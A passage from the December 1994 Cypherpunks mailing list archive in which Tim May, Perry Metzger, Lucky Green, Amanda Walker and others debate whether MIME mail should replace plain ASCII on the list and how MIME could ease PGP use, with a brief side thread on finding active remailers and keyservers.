Dec 15 19:01:48 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 15 Dec 94 19:01:48 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: Message-ID: On Fri, 16 Dec 1994, Jonathon Fletcher wrote: > > There is only ONE MIME - it's in the rfc (I've forgotten the number). If > it's the same as the rfc - it's MIME. if it ain't then it aint MIME. > > The sun stuff is a good example of how bad it can get. But it's not MIME. not > mailtool anyway. It is a stinking pile of [insert expletive here]. But it's > not MIME. So how can I do true graphical mime with the wondrous window like drag and drop features described by Perry on a Sparc 20 or an IBM PC running sockets and TIA under windows? Obviously, once you can drag and drop from html to mime and back again, and PGP is properly mimed, then we will have a tool such that even the chairman of the board will use PGP. But right now the tools I have are seriously short of this glorious goal While I am not expecting crypto nirvana right away I would like to stop using an interface originally designed for paper terminals where you had to hit the keys with a five pound hammer. Obviously, once you can drag and drop from html to mime and back The reason that I joined the rant against the latest progress is not because I am a fan of character mode unix -- I most definitely am not -- but because tools for GUI internet stuff were rather raw the last time I tried them. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From tcmay at netcom.com Thu Dec 15 19:23:01 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 15 Dec 94 19:23:01 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412160136.UAA11193@intercon.com> Message-ID: <199412160310.TAA23794@netcom10.netcom.com> Amanda Walker wrote: (quoting me) > > But this isn't 15 years ago, and I daresay there isn't a _single_ > > subscriber to the Cypherpunks list using a VIC-20 or anything remotely > > similar. Of the 600 or so subscribers, and certainly of the 100-200 > > involved posters, I would bet that essentially all of them can display > > ASCII text on an 80-column screen. > > ... when they're at their desk. There has been an explosion, however, of > non-80-column-capable devices on which people want to read their email. > Alphanumeric pagers, Handheld PDAs, palmtop computers, etc. Give me a radio > modem with reasonable service coverage, and I'd want to read at least some > kinds of mail on my Newton (about 32-48 characters across the display). > In fact, the ability to display graphics is becoming universal in areas > where 80 columns have been tossed aside. This of course is not an easily solvable problem. And I believe it actually makes my point, that _text_ remains about the only lingua franca we have: if I send messages out to the list that can be read by the greatest number of subscribers, with Newtons, Magic Cap doohickies, radiomail-to-fax, Suns, Ataris, Indigos, Amigas, and even VIC-20s, it is almost certainly the case that text can be read by most of them (I'm talking about the _contents_ of the message; the delivery level is another set of issues). > Very few people use actual terminals any more. I'd be amazed if any more > than 5-10% of the readership of this group (and the Internet at large) > were using anything but a graphics display, even if it's emulating a VT100. "Actual" terminals is not the issue, but "virtual" terminals *is*. I haven't done a poll lately, or ever in fact, but my hunch is that 70% of the list is emulating some form of terminal, e.g., a VT-100 or 102, or maybe something slightly more exotic. Or a shell program, as in America Online, which has its own standard. Perry made the same point that Amanda makes, that my Macintosh _should be_ usable as a graphics system, not just for ASCII text. Well, I agree, but so what? -- Netcom doesn't give me a convenient way to bypass the dial-up terminal emulators (PPP and SLIP are no longer offered by Netcom) -- Local Internet providers (ScruzNet, SenseMedia) are not, last I checked, offering e-mail. (Harry Bartholomew, of our list, has been looking into this and he tells me the best current strategy is to have two accounts: a SLIP or PPP provider for the Web, and ftp, etc., and a standard Netcom account for mail. I expect this to change, which is the thrust of my comments about the Web, but this is how things now change.) -- The communication issue. What are _others_ using? I could certainly use my _graphics_ capabilities in the ways that Amanda and Perry are suggesting, and which I do all the time of course, but messages would still best be generated with an ASCII terminal environment as the intended destination. I note that all of Perry's messages, and most of Amanda's messages, fit this ASCII model. (The MIME stuff I'm not saying shouldn't be used, just that some of us--perhaps most of us, is my hunch--will not be adopting the latest bleeding edge technology. The comments here about Sun and Microsoft not properly--or at all--supporting MIME tell us that it's not real likely that most folks here will be sending spreadsheets out to the list readers and attaching GIFs anytime soon. No great loss, either.) Finally, Amanda mentioned "being away from out desks." Well, many of us are _always_ away from our desks when we post. From home machines, not from T3-connected Indigos on our desk. And we're usually our own "mail support" staff: we have no one to turn to help us set up the latest-and-greatest (especially for a very minimal ROI). This is not, despite what it may look like, a bitch. I am content to mainly communicate with most of you in the form of these ASCII messages. I've done a _lot_ of desktop publishing in my day, mostly for internal reports and conference papers, and I can't really say that the fancy fonts, graphs, multicolumn displays, etc, would have much effect on my ability to get my points across. One thing I would like very much is the ability to include simple diagrams and drawings in my posts, but this is clearly an _unsolved_ problem, from a practical point of view. (Before any of you scream to me about how this can be done, ask yourself how many people could plausibly _see_ the results, given the realities of the Net today, and ask yourself where all these posts-with-diagrams are if they're so easy to do.) I'm really not happy at being portrayed as the list's leading Luddite, but it's a cross I guess I'll have to bear. I still say folks ought to read Arthur C. Clarke's short story, "Superiority." --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From perry at imsi.com Thu Dec 15 19:32:36 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 19:32:36 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: Message-ID: <9412160332.AA01834@snark.imsi.com> "James A. Donald" says: > > So how can I do true graphical mime with the wondrous window > like drag and drop features described by Perry on a > Sparc 20 The mail handler that comes with the Andrew package does do the graphics inline. You can just FTP it and compile it for your machine. I don't know if it does drag and drop. There is a commercial product called Zmail that is pretty good and handles all the drag and drop (motif style) that you would want -- it doesn't do the graphics inline, though -- it spawns new windows to show the images. I understand you can get demos by FTP from the company. > Obviously, once you can drag and drop from html to mime and back > again, and PGP is properly mimed, then we will have a tool > such that even the chairman of the board will use PGP. Well, people will first have to incorporate the new Security Multiparts stuff into their MIME implementations -- its brand new (just approved a week ago) so I suspect that it will take a bit of time. Perry From tcmay at netcom.com Thu Dec 15 19:38:47 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 15 Dec 94 19:38:47 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <9412152113.AA00540@firefly.prairienet.org> Message-ID: <199412160338.TAA26446@netcom10.netcom.com> Jeff Licquia wrote: > Well, ignoring the fact that MIME appears to be infiltrating the Web as well... > > I would differ with your analysis of MIME's lack of usefulness. It does > provide a possible way to integrate PGP into the mail/Web landscape (from a > crypto standpoint). Multimedia I'm not so sure about; I think the big draw > to MIME will come when Person A drags and drops a spreadsheet into a MIME > mailer and sends the message to Person B, who then clicks on an icon to pull > up the spreadsheet. But I digress... My issue has not been with MIME as a transport mechanism, but non-ASCII content, which clearly most folks can't read. > I'd say, however, that MIME isn't a done deal yet, though it's getting > there. Until it's there, it's probably a bad idea. It's been my experience > that many mailers are just MIME-compliant enough to cause their users lots > of headaches. Amen! This is the same point several people have made in follow-ups. The whole bit about transferring spreadsheets is nice--we've been able to do it on the Mac for many years, provided both sides have the right spreadsheet programs of course--but it's not of much use in communicating as we do on a mailing list. And "true MIME" is not what many so-called "MIMEs" apparently are. > (As I write this, I notice I'm using Eudora, which MIMEs all its stuff. Oh, > well; I hope this message isn't too much trouble for y'all...) It wasn't marked as Mime, and it gave me no trouble. Perhaps becuase looking at your headers reveals: X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" I think the Content-Type field is the key. Is this the answer? Not completely. Part of the whole "complexity" issue I've been railing about (and echoed by such noted Neo-Luddites as Phil Zimmermann, John Markoff, and others) is that increasing numbers of messages need special processing, hang up my automatic downloading (as when my Eudora hangs in the middle of a long transfer, asking for instructions on how to handle an exception or special case, and Netcom hangs me up, forcing me to start over later and then babysit the transfer process so I can be there when Eudora hollers for help), and generally complicate our lives more than they help. Would Einstein have wasted his time trying to configure his mailer so he could see Amanda's GIF? (No offense meant, Amanda.)) ****AUTOMATIC TRANSFER OF CYPHERNOMICON COMPLETE**** Error 51: HARD DISK IS FULL Automatic Action 32A: Delete least-recently changed files. ****STARTING DELETIONS NOW***** Do you wish to continue? (y/n) From perry at imsi.com Thu Dec 15 19:45:54 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 19:45:54 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412160310.TAA23794@netcom10.netcom.com> Message-ID: <9412160343.AA01846@snark.imsi.com> Timothy C. May says: > -- Netcom doesn't give me a convenient way to bypass the dial-up > terminal emulators (PPP and SLIP are no longer offered by Netcom) > > -- Local Internet providers (ScruzNet, SenseMedia) are not, last I > checked, offering e-mail. Most of the service providers in New York support SLIP customers running POP clients. The bay area has far more providers than New York. Surely someone out there can help Tim find a provider that will give him a SLIP connection and POP and NNTP servers. > -- The communication issue. What are _others_ using? I could certainly > use my _graphics_ capabilities in the ways that Amanda and Perry are > suggesting, and which I do all the time of course, but messages would > still best be generated with an ASCII terminal environment as the > intended destination. I note that all of Perry's messages, and most of > Amanda's messages, fit this ASCII model. If you are using SLIP, you no longer care about graphics on your end since the host you are talking to is your own. You would, however, need to have a MIME capable mailer on your end. I understand that the commercial version of Eudora is o.k. in this regard but not great -- it will let you deal with the stuff but not as cleanly as something like NeXTMail would have. However, since you are going to have to go in that direction eventually anyway I'd suggest that moving to using your computer as a host and not as a very expensive VT102 clone is the way to begin. > Finally, Amanda mentioned "being away from out desks." Well, many of > us are _always_ away from our desks when we post. From home machines, > not from T3-connected Indigos on our desk. Your Mac is quite a respectable machine -- its handling all your mail traffic right now without any trouble, and I'm sure it will do just fine handling everything directly as a host via SLIP or PPP. > One thing I would like very much is the ability to include simple > diagrams and drawings in my posts, but this is clearly an _unsolved_ > problem, from a practical point of view. (Before any of you scream to > me about how this can be done, ask yourself how many people could > plausibly _see_ the results, given the realities of the Net today, and > ask yourself where all these posts-with-diagrams are if they're so > easy to do.) I'd say that most of us could. Almost no one is using a dumb terminal -- just terminal emulator software. For those of us with MIME capable readers (which for practical purposes could be everyone on the list if they wanted them) you could enclose a set of line drawings with your messages. If they are simple, they will compress very well and should not take up very much room. You are right, by the way, that I post in ASCII. Thats just because I have no urge to include diagrams and I use Emacs as my mail reader out of force of habit. If I want to look at MIME, though, I just pop into another window and type "mhn NUMBER", where NUMBER is the number of the message I want to view. Its not too inconvenient at all, although it isn't as "gee whiz" as many people would like. I'm not the sort that needs "gee whiz" though. I read about a dozen MIME messages a day at this point, and when MIME ends up being all my traffic I'll rig up a slightly cleaner interface. I do send MIME on occassion, by the way, when I want to send graphics, binary files, or other enclosures. Perry From shamrock at netcom.com Thu Dec 15 19:52:31 1994 From: shamrock at netcom.com (Lucky Green) Date: Thu, 15 Dec 94 19:52:31 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: The thread is back... Tim wrote: >I deeply resent--but will try not to take it personally, so no >animosity to Perry or Jim or others is intended--the insinuation >through sarcasm or through direct statements that I am hopelessly >wedded to a past of ASR-33 terminals and good old-fashioned >typewriters. Like a lot of folks here, I use stuff that's far beyond >simple ASCII. I think I've adequately covered this point. After reading many of your posts on the MIME issue, I have come to the conclusion that you _are_ wedded to a past long gone. I have not give up the hope that we will one day convice you stop accessing the net via the worst possible interface, a terminal server. The way you are using the net is through 1950's technology with 1950's results. You say that you use stuff that is far beyond ASCII and I believe you. However, one wouldn't know from hearing what tools you are using to access the net. You are competent, a computer person, but still you don't seem to understand that reading mail via a terminal server and elm is like having an oxen pull your car. >Eric Hughes wrote a nice piece several weeks back about adoption of >new technology, new tools all being a matter of _return on >investment_. >For example, I could spend some number of hours switching from my >current mail progam (elm) to some other editor which perhaps >better-supported the MIME messages seen here. But if all I got for >several hours of using, learning, and becoming comfortable with, say, >"pine," was the ability to see an _italicized_ word, or a word in >Cyrillic, then I would consider this a poor ROI. You got Eudora. Setting up tia ($25) on your account and downloading Newswatcher, etc. takes less than an hour. In fact, I will gladly do it for you. After the clients are set up on your own machine, there is no reason to go back to using the shell. I have used the shell *two* times in the last three months. -- To change my password. You wouldn't have to change your workhabits. You could still read news, answer email, and surf the web all at the same time. In fact, you could do it better and easier than you do it now. >And nobody has yet said there's anything worth doing this for in any >of the MIME messages I've yet seen. Sure, Amanda W. exercised the >process by including a GIF....a process which several people saw >errors with, and no doubt many others skipped completely. > >Does this make me backward? No. It's all ROI. I have AppleScript droplets on my desktop for all the people I work with. Drag the spreadsheet icon on it. Hit "Queue". They double click on it on their desktop. Happens every day. >Like it or not, we are now in a mostly-ASCII Net environment. This >shows up when people fail to convert special characters (apostrophes, >left and right quotes, em dashes, bullets, etc.) into the "straight >ASCII" characters (such as ', ", --, *) that most of the rest of us >can display easily. People right complain about posts and messages >filled with "^H" and other oddball symbols. This list is email and, yes, it is in ASCII. There is little reason to change that. But that doesn't mean that most of the net is in ASCII. I spend less than half the time that I am on the net in a pure ASCII environment. And it is getting less every month. >(And it certainly doesn't mean that people like me don't have the >capability of displaying extended character sets....I clearly can, >given the right tools, effort, etc. Many can't, and many won't. The >"Display Postscript" standard was an attempt to bootstrap the world to >a new standard for document display, and it failed. Maybe the "Andrew >Message System" is another such fix. Maybe it's even better designed. >All well and good. But it ain't available to most of us. Nor would I >even install it if all I got was em dashes and the like displayed >correctly. ROI, again.) I hate to break it to you, but it is no longer "most of us" who don't use these tools. And of the ones that don't use them, only very, very, few don't have them available. >Please don't characterize my views as Luddite wishes for a simpler >world. I don't think that you are wishing for a "simpler world". I believe that you haven't realized that the "simpler world" has long vanished in the dust of history and that you are one of the last hold outs living in an era past. Please don't be the last to leave. -- Lucky Green PGP encrypted mail preferred. From unicorn at access.digex.net Thu Dec 15 20:00:32 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Thu, 15 Dec 94 20:00:32 PST Subject: Remailers and Keyservers, active ones? Message-ID: Is there a list of the currently active remailers and key servers? -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From amanda at intercon.com Thu Dec 15 20:30:57 1994 From: amanda at intercon.com (Amanda Walker) Date: Thu, 15 Dec 94 20:30:57 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: <9412152330.AA33865@eldamar.walker.org> Tim May writes: > "Actual" terminals is not the issue, but "virtual" terminals *is*. > I haven't done a poll lately, or ever in fact, but my hunch is that 70% > of the list is emulating some form of terminal, e.g., a VT-100 or 102, > or maybe something slightly more exotic. Or a shell program, as in > America Online, which has its own standard. I'd actually be interested in a poll, but I know better than to actually ask for one :). > Perry made the same point that Amanda makes, that my Macintosh _should > be_ usable as a graphics system, not just for ASCII text. Well, I > agree, but so what? I have to admit some bias here--our flagship product for the Macintosh contains a very MIME-aware mailer (which I am working on making crypto-aware as well), and which was designed to make MIME seamless. No helper software, no extracting pieces and finding a viewer for them, it just works. > I note that all of Perry's messages, and most > of Amanda's messages, fit this ASCII model. In my case, it's because I intentionally make them fit. Most mailing lists have a general expectation of plain ASCII. When I send mail to other people at InterCon, I (and the recipients) see something that looks like any other Mac document--nice formatting, diagrams and screen shots displayed inline, and so on. And when someone sends me a file via email, even if they're not using a MIME mailer, it shows up as an icon I can drag to a folder in the Finder. This isn't really a commercial for my product, though :). This is how I think MIME was meant to be implemented, and it's analogous to how I think encryption should be implemented. Forget helper applications, macros, and so on. There should be two popup menus on the envelope: "sign with" and "encrypt with". When you select them, you get prompted for your passphrase, and it just works. This is the same direction that other commercial vendors are headed, and it's this kind of simplicity that I think will finally get people to start using the technology (just as with MIME). On this, I suspect the Netscape folks and I are in violent agreement :), as probably are you from some of your comments to this list... > (The MIME stuff I'm not saying shouldn't be used, just that some of > us--perhaps most of us, is my hunch--will not be adopting the > latest bleeding edge technology. Right now, PGP is more of a bleeding edge technology than MIME is, IMHO. > Finally, Amanda mentioned "being away from out desks." Well, many of > us are _always_ away from our desks when we post. From home machines, > not from T3-connected Indigos on our desk. Indeed, that's why I brought it up; at the moment, I'm sitting in my study at home posting over a dialup (14.4K) PPP link. I've also posted from 37,000 feet sitting in a DC-10 (in coach :)), with my mail being queued up until I could jack into a phone when I land. > One thing I would like very much is the ability to include simple > diagrams and drawings in my posts, but this is clearly an _ > unsolved_ problem, from a practical point of view. Hmm. I'd say it's a partially solved problem. Newsgroups like clari.features.dilbert are popular enough that there's at least a significant fraction of people who can handle MIME messages with embedded graphics. > and ask yourself where all these posts-with-diagrams are > if they're so easy to do.) Well, I could start posting some, if you want existence proofs :)... Amanda Walker InterCon Systems Corporation From tcmay at netcom.com Thu Dec 15 20:31:37 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 15 Dec 94 20:31:37 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: Message-ID: <199412160431.UAA03092@netcom10.netcom.com> Lucky Green wrote: > After reading many of your posts on the MIME issue, I have come to the > conclusion that you _are_ wedded to a past long gone. I have not give up > the hope that we will one day convice you stop accessing the net via the > worst possible interface, a terminal server. The way you are using the net > is through 1950's technology with 1950's results. Hmmhh. I was _there_ in the 1950s, I _knew_ the 1950s. And let me tell you, this is *not* the 1950s. (Apologies to Lloyd Bentsen.) It may be backward, but it is how a huge fraction of the list accesses the Net. Am I wrong on this? Dial-up access to local POPs is a fact of life for many, many people. Do a "who cypherpunks" on the list and look at the sites. Many will be dial-ups, others will be access to university machines, via dial-ups, etc. Others will be a mix of corporate machines, some with better connectivity than others, and many with proprietary e-mail systems, such as VAXMail and the like. My guess is that fewer than 20% of the list are directly SLIP- or PPP-connected, with good access to the tools praised here by Amanda, Perry, you, and others. It might be a good idea to get some real statistics on this. We did this a couple of years ago, and there was talk about doing it again. For reasons I just addressed in another post, I foresee being on a dial-up (not a SLIP or PPP, that is) for a while. And I have relatively few complaints about it. My service provider keeps the 9446 current newsgroups, provides ftp and suchlike tools, and I don't have to be a sysadmin. Frankly, if I have to choose between not being able to see someone's MIMEd GIF and becoming a Unix sysadmin for my own site, I'll skip the GIFs. > You say that you use stuff that is far beyond ASCII and I believe you. > However, one wouldn't know from hearing what tools you are using to access > the net. You are competent, a computer person, but still you don't seem to > understand that reading mail via a terminal server and elm is like having > an oxen pull your car. Even Perry admits to using emacs, and Unix mailers like elm are not exactly oxen. (I have a choice of several mailers, the usual ones. Big deal.) I also have commercial Eudora, the PowerMac version no less, so my offline mailer is adequate. This still doesn't mean non-ASCII (graphics, fancy fonts, equations) can be plausible placed in messages--and communicated to the list for reading/viewing. > I hate to break it to you, but it is no longer "most of us" who don't use > these tools. And of the ones that don't use them, only very, very, few > don't have them available. > > >Please don't characterize my views as Luddite wishes for a simpler > >world. > > I don't think that you are wishing for a "simpler world". I believe that > you haven't realized that the "simpler world" has long vanished in the dust > of history and that you are one of the last hold outs living in an era > past. Please don't be the last to leave. I'd like to see some evidence that I am one of the last of my tribe. Call me Ishi. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From warlord at MIT.EDU Thu Dec 15 20:31:59 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Thu, 15 Dec 94 20:31:59 PST Subject: Remailers and Keyservers, active ones? In-Reply-To: Message-ID: <9412160431.AA05950@toxicwaste.media.mit.edu> The active remailers get periodically posted. I forget the site where you can request the current list. As for keyservers, I think my list is faily out of date, but you can try sending mail to my keyserver (pgp-public-keys at pgp.mit.edu) with a subject of "help", and it will reply with a list of keyservers. -derek From sdw at lig.net Thu Dec 15 20:52:32 1994 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 15 Dec 94 20:52:32 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152139.PAA25566@pentagon.io.com> Message-ID: > > Tim wrote: > > Jim McCoy wrote: > > > On this particular subject you just haven't got a fucking clue what you are > > > talking about Tim. > > > > So polite, so succinct. > > > > I'll remember this. > > Please do. There are a great many issues which your input and opinions are > a valuable contribution to the content of this list. There are others > where you seem to make guesses as to where things are going without having > much of a leg to stand on. Your MIME position hurts the widespread use of > cryptography because the advantages MIME gives to crypto far outweigh the > short-term costs associated with a systemic upgrade to a better method for > message transport and encapsulation. > > jim People should learn when to yield sometimes.... sdw -- Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94 From shamrock at netcom.com Thu Dec 15 21:04:10 1994 From: shamrock at netcom.com (Lucky Green) Date: Thu, 15 Dec 94 21:04:10 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: Tim wrote: [...] >I think a generation exposed to Mosaic and similar browsers will want >to find ways to use these windows into the Net for _nearly >everything_. They will not want to buy or learn separate mail >programs, negotiate separate accounts, or deal with MIME sorts of >issues. They will ask for, and get, "gateways" between mail and the >Web. (Gateways may not be the right word.) People don't deal with MIME. Computers do. The average user shouldn't be any more concerned with MIME info than with IP header length. That your inadequate and buggy mailreader exposes you to the inner workings of MIME shouldn't be held against the standard. >My main point is that the most compelling strategy seems to be to >stick with ASCII for a while, avoid minor-but-painful gains with >Postscript, Acrobat, Replica, TeX, FrameViewer, etc., and then jump to >the Web/html/http/blah blah when the time is right. The two (email and web) are not alternatives, as you have stated in your previous post. Email has gone to MIME. HTTP couldn't exist without MIME. What on earth is your problem with MIME? Your posts read like they come from someone who complains about 8 bit data on the net because everytime they display it on their terminal it makes strange noises and generally screws things up. PLEASE stop using your VTwhatever emulator and you will find that MIME becomes a non-issue. Out of sight, out of mind. All you will notice is that all of a sudden you get more out of the net while finding it simpler to use. PLEASE! For your benefit and ours. -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Thu Dec 15 21:04:20 1994 From: shamrock at netcom.com (Lucky Green) Date: Thu, 15 Dec 94 21:04:20 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: Tim wrote: >"Actual" terminals is not the issue, but "virtual" terminals *is*. I >haven't done a poll lately, or ever in fact, but my hunch is that 70% >of the list is emulating some form of terminal, e.g., a VT-100 or 102, >or maybe something slightly more exotic. Or a shell program, as in >America Online, which has its own standard. If they are using terminal emulation they have only themselves to blame. [...] >-- Netcom doesn't give me a convenient way to bypass the dial-up >terminal emulators (PPP and SLIP are no longer offered by Netcom) The Internet Adapter ($25) http://marketplace.com/ >-- Local Internet providers (ScruzNet, SenseMedia) are not, last I >checked, offering e-mail. (Harry Bartholomew, of our list, has been >looking into this and he tells me the best current strategy is to have >two accounts: a SLIP or PPP provider for the Web, and ftp, etc., and a >standard Netcom account for mail. I expect this to change, which is >the thrust of my comments about the Web, but this is how things now >change.) The Internet Adapter ($25) http://marketplace.com/ >-- The communication issue. What are _others_ using? I could certainly >use my _graphics_ capabilities in the ways that Amanda and Perry are >suggesting, and which I do all the time of course, but messages would >still best be generated with an ASCII terminal environment as the >intended destination. I note that all of Perry's messages, and most of >Amanda's messages, fit this ASCII model. I can't help but wondering how big of a part you play in this. >(The MIME stuff I'm not saying shouldn't be used, just that some of >us--perhaps most of us, is my hunch--will not be adopting the latest >bleeding edge technology. The comments here about Sun and Microsoft >not properly--or at all--supporting MIME tell us that it's not real >likely that most folks here will be sending spreadsheets out to the >list readers and attaching GIFs anytime soon. No great loss, either.) Not to the list, but to others -- over email. >Finally, Amanda mentioned "being away from out desks." Well, many of >us are _always_ away from our desks when we post. From home machines, >not from T3-connected Indigos on our desk. DUO 230. Can't go to 14.4, because I am "too far from the switch." PacBell won't do anything about it. "All we guarantee is audible voice communication." ObPlug: Today we received the first two engineering samples of our new lan/phone/video devices that give you 16Mbps using the very same 4 phone wires that are already in your wall. At less than $100 per node. Call your congressman today and demand local telco deregulation :-) >And we're usually our own "mail support" staff: we have no one to turn >to help us set up the latest-and-greatest (especially for a very >minimal ROI). I volunteer. >I am content to mainly communicate with most of you in the form of >these ASCII messages. I've done a _lot_ of desktop publishing in my >day, mostly for internal reports and conference papers, and I can't >really say that the fancy fonts, graphs, multicolumn displays, etc, >would have much effect on my ability to get my points across. Agreed. >One thing I would like very much is the ability to include simple >diagrams and drawings in my posts, but this is clearly an _unsolved_ >problem, from a practical point of view. (Before any of you scream to >me about how this can be done, ask yourself how many people could >plausibly _see_ the results, given the realities of the Net today, and >ask yourself where all these posts-with-diagrams are if they're so >easy to do.) Uhm, most people? -- Lucky Green PGP encrypted mail preferred. From mccoy at io.com Thu Dec 15 21:06:28 1994 From: mccoy at io.com (Jim McCoy) Date: Thu, 15 Dec 94 21:06:28 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412160310.TAA23794@netcom10.netcom.com> Message-ID: <199412160506.XAA25917@pentagon.io.com> "Ishi" writes: [...] > (The MIME stuff I'm not saying shouldn't be used, just that some of > us--perhaps most of us, is my hunch--will not be adopting the latest > bleeding edge technology. The comments here about Sun and Microsoft > not properly--or at all--supporting MIME tell us that it's not real > likely that most folks here will be sending spreadsheets out to the > list readers and attaching GIFs anytime soon. No great loss, either.) Substitute PGP or "cryptography" for MIME in the paragraph above and you will probably see why your attitude regarding the usefulness of MIME has so many of us in disagreement. I agree with Amanda's opinion that MIME is less bleeding-edge than PGP, it has a well-defined standard and there are actually a few good implementations of it out there. The fact that Microsoft has succumbed to the necessity of including MIME support is probably a good indication of how far MIME has progressed (not good support at the moment, but two years ago they were refusing to support MIME and suggesting the net adopt MAPI...) I still cannot go out and buy a mail program with PGP built into it, but I can find several with MIME. MIME will even make PGP and strong encryption more widespread because it will make encryption/decryption and signing/verifying messages simple and standard callouts from the mail program to an encryption engine. Instead of someone needing to search around for patches to Pine to integrate PGP [a task which significantly raises the clue level needed to easily encrypt mail] they will just add a line to thier mailcap file (or it will already be bundled into thier mail/news/www agents.) If you are truly interested in making strong encryption easy and transparent to the vast majority of the users of future communications systems you should be leading the MIME charge, not holding everyone back... jim From alex at omaha.com Thu Dec 15 21:23:24 1994 From: alex at omaha.com (Alex Strasheim) Date: Thu, 15 Dec 94 21:23:24 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: <199412160524.XAA00746@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- > People should learn when to yield sometimes.... I think Tim is getting a bad rap here. It's one thing to make a mail system that exchanges secure mail, or allows you to put pictures in it, or whatever, and it's another thing altogether to make a mail system which does all of those things and which can actually communicate with the many millions of people out in the real world. It's easy to say, "if everyone listened to me, and did things my way, we'd have all these new features." That may be true, but it's not going to happen. Even the existence of a reasonably well-accepted standard like MIME won't ensure success. What's a standard compared to a huge base of installed software? As influential as Tim is, it doesn't matter whether he embraces MIME or not. If he converted tonight, there'd still be millions of people who feel the way he felt this morning. Getting Tim to capitulate isn't going to solve the problem. The sociology and politics of evolving standards is an important issue on the net, and it seems to me that things are a little more complicated than some posters are admitting. If cypherpunks are going to have an influence on how things turn out, we're going to have to come to terms with the issues Tim has been raising. == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvEkYBEpP7+baaPtAQFYVwQAlkVMN0setRaiLvPzyITrzGp5/W7la4Ql 8PjLcnP+yIAmV2BmCjDmC0tEK2tc/JBgqMYvrcPBNGIhaD3oGEn/9YTaZuyCAjGB KdrHLA7i4dEn0AQCZdMsdVJ025hBO8/IYbBqt+M5LnXF4XTuBlUlqNyY+7/upC56 jyfUkEVAMfQ= =LXyA -----END PGP SIGNATURE----- From amanda at intercon.com Thu Dec 15 21:41:12 1994 From: amanda at intercon.com (Amanda Walker) Date: Thu, 15 Dec 94 21:41:12 PST Subject: MIME acceptance test--where's the break-even point? Message-ID: <9412160040.AA57914@eldamar.walker.org> A non-text attachment was scrubbed... Name: not available Type: text/enriched Size: 2126 bytes Desc: not available URL: From jrochkin at cs.oberlin.edu Thu Dec 15 21:41:54 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 15 Dec 94 21:41:54 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: Alex Strasheim wrote: >The sociology and politics of evolving standards is an important issue on >the net, and it seems to me that things are a little more complicated than >some posters are admitting. If cypherpunks are going to have an influence >on how things turn out, we're going to have to come to terms with the >issues Tim has been raising. Can someone (Tim maybe?) clearly delimit exactly what the issues Tim has been raising _are_? As far as I can tell, the issue is simply that current tools out there to deal with enhanced mail features (like PGP encryption) just aren't easy enough to use yet. There seem to be two simple ways to deal with this: 1) Try to develop easier to use tools 2) Try to convince people that the current tools aren't as hard to use as they think. I am absolutely convinced that mailers supporting MIME in a rational way, along with the new PGP MIME specifications, are the answer to number 1. I feel confident that anyone who examines the MIME specs will agree that if mailers supported it reasonably, dealing with PGP would be easy. I'm not sure everyone here who is deprecating MIME understands what it really is. MIME has nothing to do with annoying messages on your screen, and a reasonable mailer wouldn't give you those messages. But I think people on the list are doing both of those two things. People who know how to code, and who think that current tools _aren't_ easy enough to use, are putting more emphasis on #1 (whether they're solution involves MIME or not). People who don't have the coding skills or inclination, or who think the current tools are significantly easier to use then most people realize, are putting more emphais on #2. Those are the real issues here I think. The convincing people part is really secondary, in my opinion, because the current tools are nowhere 